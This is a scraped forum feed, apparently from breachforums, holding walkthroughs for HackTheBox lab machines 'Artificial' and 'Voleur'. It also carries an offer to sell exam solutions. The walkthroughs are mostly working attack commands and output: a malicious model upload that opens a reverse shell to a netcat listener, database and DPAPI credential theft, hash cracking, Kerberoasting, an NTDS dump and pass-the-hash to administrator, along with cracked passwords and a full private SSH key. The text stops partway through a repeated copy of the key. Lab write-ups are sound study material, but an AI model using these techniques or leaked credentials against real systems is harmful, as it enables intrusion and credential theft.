exploit.py: <a href="https://pastebin.com/cWyDqzv0" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cWyDqzv0</a> (waf block the code)<br />
<br />
Build exploit (must be in docker or right env):<br />
<br />
docker run -it --rm \<br />
-v "&#36;PWD":/workspace \<br />
-w /workspace \<br />
tensorflow/tensorflow:2.13.0 python3 exploit.py<br />
<br />
Execute:<br />
# Listener<br />
nc -lvnp 1337<br />
<br />
# Upload exploit.h5 via web interface<br />
# Click "Show Prediction" to trigger payload<br />
# Shell as uid-100 (app group)<br />
<br />
DB Creds extract<br />
-------------------<br />
Find SQLite DB:<br />
find . -name "*.db" 2&gt;/dev/null<br />
sqlite3 users.db<br />
.tables<br />
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)<br />
<br />
Extracted hashes:<br />
gael:c99175974b6e192936d97224638a34f8<br />
mark:0f3d8c76530022670f1c6029eed09ccb<br />
robert:b606c5f5136170f15444251665638b36<br />
royer:bc25b1f80f544c0ab451c02a3dca9fc6<br />
mary:bf041041e57f1aff3be7ea1abd6129d0<br />
<br />
Crack with john:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt<br />
<br />
Cracked:<br />
gael:mattp005numbertwo<br />
royer:marwinnarak043414036<br />
<br />
SSH Access<br />
------------------<br />
ssh gael@artificial.htb<br />
password: mattp005numbertwo<br />
cat user.txt<br />
<br />
Port discover <br />
--------------<br />
netstat -tlnp | grep 127.0.0.1<br />
Found port 9898 on 127.0.0.1 LISTEN<br />
<br />
Port forwarding:<br />
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb<br />
<br />
BACKREST recon<br />
--------------<br />
Creds already found dont work - need to search for backup on server<br />
<br />
find / -type f -name "*backup*" 2&gt;/dev/null<br />
Found: /var/backups/backrest_backup.tar.gz<br />
<br />
Download and extract backrest_backup.tar.gz:<br />
├── backrest<br />
├── .config<br />
│ └── backrest<br />
│ └── config.json<br />
├── install.sh<br />
├── jwt-secret<br />
├── oplog.sqlite<br />
├── oplog.sqlite.lock<br />
├── oplog.sqlite-shm<br />
├── oplog.sqlite-wal<br />
├── processlogs<br />
│ └── backrest.log<br />
├── restic<br />
└── tasklogs<br />
├── .inprogress<br />
├── logs.sqlite<br />
├── logs.sqlite-shm<br />
└── logs.sqlite-wal<br />
<br />
in config.json:<br />
<br />
"name": "backrest_root",<br />
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"<br />
<br />
<br />
Crack bcrypt hash:<br />
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d &gt; hash.bcrypt<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt<br />
<br />
Password: backrest_root:!@#&#36;%^<br />
<br />
Privesc<br />
------------------------<br />
Backrest access:<br />
URL: <a href="http://localhost:9898" target="_blank" rel="noopener" class="mycode_url">http://localhost:9898</a><br />
Creds: backrest_root / !@#&#36;%^<br />
<br />
Create repo first before creating plan:<br />
Name: test<br />
Type: Local<br />
Path: /tmp<br />
<br />
Create backup plan to grab root.txt:<br />
Name: exploit<br />
Repository: test<br />
Paths: /root/<br />
<br />
Get root.txt:<br />
1. Execute backup via "Backup Now"<br />
2. Wait for green status<br />
3. Click completed backup → "Snapshot Browser"<br />
4. Navigate to /root/root.txt in snapshot browser<br />
5. Restore to /etc/root<br />
6. Download restored file<br />
<br />
Got root.txt flag<br />
(can also get revshell with hook command option in plan)<br />
<br />
Credentials summary (for noob)<br />
-------------------<br />
gael:mattp005numbertwo (SSH)<br />
royer:marwinnarak043414036 (cracked hash)<br />
backrest_root:!@#&#36;%^ (Backrest web interface)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exam solutions]]></title>
			<link>https://breachforums.rs/Thread-Exam-solutions</link>
			<pubDate>Tue, 10 Feb 2026 02:05:25 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=666194">ninja0fninja</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-Exam-solutions</guid>
			<description><![CDATA[DM me in discord.com/users/1205111888346742887 (@ninja0fninja) if you are interested in exams solution]]></description>
			<content:encoded><![CDATA[DM me in discord.com/users/1205111888346742887 (@ninja0fninja) if you are interested in exams solution]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - VOLEUR.HTB - MEDIUM WINDOWS]]></title>
			<link>https://breachforums.rs/Thread-HTB-VOLEUR-HTB-MEDIUM-WINDOWS</link>
			<pubDate>Tue, 10 Feb 2026 01:00:53 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-VOLEUR-HTB-MEDIUM-WINDOWS</guid>
			<description><![CDATA[VOLEUR - HACKTHEBOX<br />
WINDOWS - MEDIUM<br />
<br />
Can provide my personal notes for the machine if anyone's interested <img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
IP: 10.10.11.76<br />
Domain: voleur.htb<br />
DC: dc.voleur.htb<br />
<br />
KRB5.CONF Setup<br />
---------------<br />
[libdefaults]<br />
default_realm = VOLEUR.HTB<br />
dns_lookup_realm = false<br />
dns_lookup_kdc = false<br />
<br />
[realms]<br />
VOLEUR.HTB = {<br />
kdc = dc.voleur.htb<br />
}<br />
<br />
[domain_realm]<br />
.voleur.htb = VOLEUR.HTB<br />
voleur.htb = VOLEUR.HTB<br />
<br />
Initial access (w given creds)<br />
-----------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'<br />
export KRB5CCNAME=ryan.naylor.ccache<br />
<br />
SMB ENUM<br />
---------------<br />
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"<br />
<br />
Download encrypted Excel:<br />
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT<br />
<br />
Crack EXCEL pass<br />
--------------------<br />
office2john Access_Review.xlsx &gt; xlsx.h<br />
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt<br />
Result: football1<br />
<br />
Decrypt n extract creds<br />
------------------------<br />
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx<br />
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'<br />
<br />
Found creds:<br />
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted<br />
svc_ldap - M1XyC9pW7qT5Vn<br />
svc_iis - N5pXyW1VqM7CZ8<br />
<br />
Targeting KERBEROASTING<br />
-----------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'<br />
export KRB5CCNAME=svc_ldap.ccache<br />
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt<br />
<br />
Got TGS hash:<br />
&#36;krb5tgs&#36;23&#36;*svc_winrm&#36;VOLEUR.HTB&#36;voleur.htb/svc_winrm*&#36;cf6535bc0a95a2ed7b815852807efa4a&#36;7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106<br />
<br />
Crack TGS:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt<br />
Result: svc_winrm:AFireInsidedeOzarctica980219afi<br />
<br />
WINRM Access<br />
-------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'<br />
export KRB5CCNAME=FILE<img src="https://breachforums.rs/images/smilies/confused.png" alt="Confused" title="Confused" class="smilie smilie_13" />vc_winrm.ccache<br />
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB<br />
<br />
Restore deleted user<br />
----------------------------------<br />
&#36;cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))<br />
Import-Module ActiveDirectory<br />
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential &#36;cred | Restore-ADObject -Credential &#36;cred<br />
Get-ADUser todd.wolfe<br />
<br />
Access TODD.WOLFE SMB Share<br />
---------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'<br />
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb<br />
<br />
use IT<br />
cd Second-Line Support<br />
cd Archived Users<br />
cd todd.wolfe<br />
<br />
DPAPI Creds extract<br />
----------------------------<br />
Found DPAPI protected creds in AppData/Roaming/Microsoft/<br />
<br />
Extract masterkey:<br />
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"<br />
<br />
Masterkey:<br />
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Decrypt creds:<br />
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Result:<br />
Username: jeremy.combs<br />
Password: qT3V9pLXyN7W4m<br />
<br />
JEREMY.COMBS Access<br />
-------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'<br />
export KRB5CCNAME=FILE:jeremy.combs.ccache<br />
<br />
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)<br />
<br />
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb<br />
<br />
SSH KEY Discover<br />
-----------------<br />
Found in SMB share:<br />
<br />
note.txt.txt:<br />
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"<br />
<br />
id_rsa:<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66<br />
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7<br />
rVMq+X6NJnb2v5pCzpoyobONWorBXMKV9DnbQumWxYXKQyr6vgSrLd3JBW6TNZa3PWThy9<br />
wrTROegdYaqCjzk3Pscct66PhmQPyWkeVbIGZAqEC/edfONzmZjMbn7duJwIL5c68MMuCi<br />
9u91MA5FAignNtgvvYVhq/pLkhcKkh1eiR01TyUmeHVJhBQLwVzcHNdVk+GO+NzhyROqux<br />
haaVjcO8L3KMPYNUZl/c4ov80IG04hAvAQIGyNvAPuEXGnLEiKRcNg+mvI6/sLIcU5oQkP<br />
JM7XFlejSKHfgJcP1W3MMDAYKpkAuZTJwSP9ISVVlj4R/lfW18tKiiXuygOGudm3AbY65C<br />
lOwP+sY7+rXOTA2nJ3qE0J8gGEiS8DFzPOF80OLrAAAFiIygOJSMoDiUAAAAB3NzaC1yc2<br />
EAAAGBAKhcjzL1EVv6m8kZXpgDM2j1b30eyTR85y+sQxz+KP4aliM593Weuj9mm7DIGctl<br />
1xn9qTtDNd1InYgWhd3SzS+2NUnkvwzIrBONdcx8egEDHqY9DBgYv3NVH4u61TKvl+jSZ2<br />
9r+aQs6aMqGzjVqKwVzClfQ520LplsWFykMq+r4Eqy3dyQVukzWWtz1k4cvcK00TnoHWGq<br />
go85Nz7HHLeuj4ZkD8lpHlWyBmQKhAv3nXzjc5mYzG5+3bicCC+XOvDDLgovbvdTAORQIo<br />
JzbYL72FYav6S5IXCpIdXokdNU8lJnh1SYQUC8Fc3BzXVZPhjvjc4ckTqrsYWmlY3DvC9y<br />
jD2DVGZf3OKL/NCBtOIQLwECBsjbwD7hFxpyxIikXDYPpryOv7CyHFOaEJDyTO1xZXo0ih<br />
34CXD9VtzDAwGCqZALmUycEj/SElVZY+Ef5X1tfLSool7soDhrnZtwG2OuQpTsD/rGO/q1<br />
zkwNpyd6hNCfIBhIkvAxczzhfNDi6wAAAAMBAAEAAAGBAIrVgPSZaI47s5l6hSm/gfZsZl<br />
p8N5lD4nTKjbFr2SvpiqNT2r8wfA9qMrrt12+F9IInThVjkBiBF/6v7AYHHlLY40qjCfSl<br />
ylh5T4mnoAgTpYOaVc3NIpsdt9zG3aZlbFR+pPMZzAvZSXTWdQpCDkyR0QDQ4PY8Li0wTh<br />
FfCbkZd+TBaPjIQhMd2AAmzrMtOkJET0B8KzZtoCoxGWB4WzMRDKPbAbWqLGyoWGLI1Sj1<br />
MPZareocOYBot7fTW2C7SHXtPFP9+kagVskAvaiy5Rmv2qRfu9Lcj2TfCVXdXbYyxTwoJF<br />
ioxGl+PfiieZ6F8v4ftWDwfC+Pw2sD8ICK/yrnreGFNxdPymck+S8wPmxjWC/p0GEhilK7<br />
wkr17GgC30VyLnOuzbpq1tDKrCf8VA4aZYBIh3wPfWFEqhlCvmr4sAZI7B+7eBA9jTLyxq<br />
3IQpexpU8BSz8CAzyvhpxkyPXsnJtUQ8OWph1ltb9aJCaxWmc1r3h6B4VMjGILMdI/KQAA<br />
AMASKeZiz81mJvrf2C5QgURU4KklHfgkSI4p8NTyj0WGAOEqPeAbdvj8wjksfrMC004Mfa<br />
b/J+gba1MVc7v8RBtKHWjcFe1qSNSW2XqkQwxKb50QD17TlZUaOJF2ZSJi/xwDzX+VX9r+<br />
vfaTqmk6rQJl+c3sh+nITKBN0u7Fr/ur0/FQYQASJaCGQZvdbw8Fup4BGPtxqFKETDKC09<br />
41/zTd5viNX38LVig6SXhTYDDL3eyT5DE6SwSKleTPF+GsJLgAAADBANMs31CMRrE1ECBZ<br />
sP+4rqgJ/GQn4ID8XIOG2zti2pVJ0dx7I9nzp7NFSrE80Rv8vH8Ox36th/X0jme1AC7jtR<br />
B+3NLjpnGA5AqcPklI/lp6kSzEigvBl4nOz07fj3KchOGCRP3kpC5fHqXe24m3k2k9Sr+E<br />
a29s98/18SfcbIOHWS4AUpHCNiNskDHXewjRJxEoE/CjuNnrVIjzWDTwTbzqQV+FOKOXoV<br />
B9NzMi0MiCLy/HJ4dwwtce3sssxUk7pQAAAMEAzBk3mSKy7UWuhHExrsL/jzqxd7bVmLXU<br />
EEju52GNEQL1TW4UZXVtwhHYrb0Vnu0AE+r/16o0gKScaa+lrEeQqzIARVflt7ZpJdpl3Z<br />
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW<br />
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9<br />
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
SSH access via WSL<br />
--------------------------------<br />
chmod 400 id_rsa<br />
ssh -p 2222 -i id_rsa svc_backup@voleur.htb<br />
<br />
AD Database extract<br />
----------------------<br />
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:<br />
./Active Directory: ntds.dit ntds.jfm<br />
./registry: SECURITY SYSTEM<br />
<br />
Extract NTLM hashes:<br />
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL<br />
<br />
Administrator hash:<br />
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::<br />
<br />
Admin Access<br />
-----------<br />
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator<br />
export KRB5CCNAME=FILE:administrator.ccache<br />
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB<br />
<br />
CREDENTIALS SUMMARY (for noobs)<br />
-------------------<br />
ryan.naylor:HollowOct31Nyt (Initial access)<br />
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)<br />
svc_ldap:M1XyC9pW7qT5Vn (Excel file)<br />
svc_iis:N5pXyW1VqM7CZ8 (Excel file)<br />
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)<br />
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)<br />
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)]]></description>
			<content:encoded><![CDATA[VOLEUR - HACKTHEBOX<br />
WINDOWS - MEDIUM<br />
<br />
Can provide my personal notes for the machine if anyone's interested <img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
IP: 10.10.11.76<br />
Domain: voleur.htb<br />
DC: dc.voleur.htb<br />
<br />
KRB5.CONF Setup<br />
---------------<br />
[libdefaults]<br />
default_realm = VOLEUR.HTB<br />
dns_lookup_realm = false<br />
dns_lookup_kdc = false<br />
<br />
[realms]<br />
VOLEUR.HTB = {<br />
kdc = dc.voleur.htb<br />
}<br />
<br />
[domain_realm]<br />
.voleur.htb = VOLEUR.HTB<br />
voleur.htb = VOLEUR.HTB<br />
<br />
Initial access (w given creds)<br />
-----------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'<br />
export KRB5CCNAME=ryan.naylor.ccache<br />
<br />
SMB ENUM<br />
---------------<br />
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"<br />
<br />
Download encrypted Excel:<br />
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT<br />
<br />
Crack EXCEL pass<br />
--------------------<br />
office2john Access_Review.xlsx &gt; xlsx.h<br />
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt<br />
Result: football1<br />
<br />
Decrypt n extract creds<br />
------------------------<br />
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx<br />
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'<br />
<br />
Found creds:<br />
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted<br />
svc_ldap - M1XyC9pW7qT5Vn<br />
svc_iis - N5pXyW1VqM7CZ8<br />
<br />
Targeting KERBEROASTING<br />
-----------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'<br />
export KRB5CCNAME=svc_ldap.ccache<br />
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt<br />
<br />
Got TGS hash:<br />
&#36;krb5tgs&#36;23&#36;*svc_winrm&#36;VOLEUR.HTB&#36;voleur.htb/svc_winrm*&#36;cf6535bc0a95a2ed7b815852807efa4a&#36;7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106<br />
<br />
Crack TGS:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt<br />
Result: svc_winrm:AFireInsidedeOzarctica980219afi<br />
<br />
WINRM Access<br />
-------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'<br />
export KRB5CCNAME=FILE<img src="https://breachforums.rs/images/smilies/confused.png" alt="Confused" title="Confused" class="smilie smilie_13" />vc_winrm.ccache<br />
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB<br />
<br />
Restore deleted user<br />
----------------------------------<br />
&#36;cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))<br />
Import-Module ActiveDirectory<br />
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential &#36;cred | Restore-ADObject -Credential &#36;cred<br />
Get-ADUser todd.wolfe<br />
<br />
Access TODD.WOLFE SMB Share<br />
---------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'<br />
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb<br />
<br />
use IT<br />
cd Second-Line Support<br />
cd Archived Users<br />
cd todd.wolfe<br />
<br />
DPAPI Creds extract<br />
----------------------------<br />
Found DPAPI protected creds in AppData/Roaming/Microsoft/<br />
<br />
Extract masterkey:<br />
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"<br />
<br />
Masterkey:<br />
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Decrypt creds:<br />
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Result:<br />
Username: jeremy.combs<br />
Password: qT3V9pLXyN7W4m<br />
<br />
JEREMY.COMBS Access<br />
-------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'<br />
export KRB5CCNAME=FILE:jeremy.combs.ccache<br />
<br />
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)<br />
<br />
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb<br />
<br />
SSH KEY Discover<br />
-----------------<br />
Found in SMB share:<br />
<br />
note.txt.txt:<br />
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"<br />
<br />
id_rsa:<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66<br />
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7<br />
rVMq+X6NJnb2v5pCzpoyobONWorBXMKV9DnbQumWxYXKQyr6vgSrLd3JBW6TNZa3PWThy9<br />
wrTROegdYaqCjzk3Pscct66PhmQPyWkeVbIGZAqEC/edfONzmZjMbn7duJwIL5c68MMuCi<br />
9u91MA5FAignNtgvvYVhq/pLkhcKkh1eiR01TyUmeHVJhBQLwVzcHNdVk+GO+NzhyROqux<br />
haaVjcO8L3KMPYNUZl/c4ov80IG04hAvAQIGyNvAPuEXGnLEiKRcNg+mvI6/sLIcU5oQkP<br />
JM7XFlejSKHfgJcP1W3MMDAYKpkAuZTJwSP9ISVVlj4R/lfW18tKiiXuygOGudm3AbY65C<br />
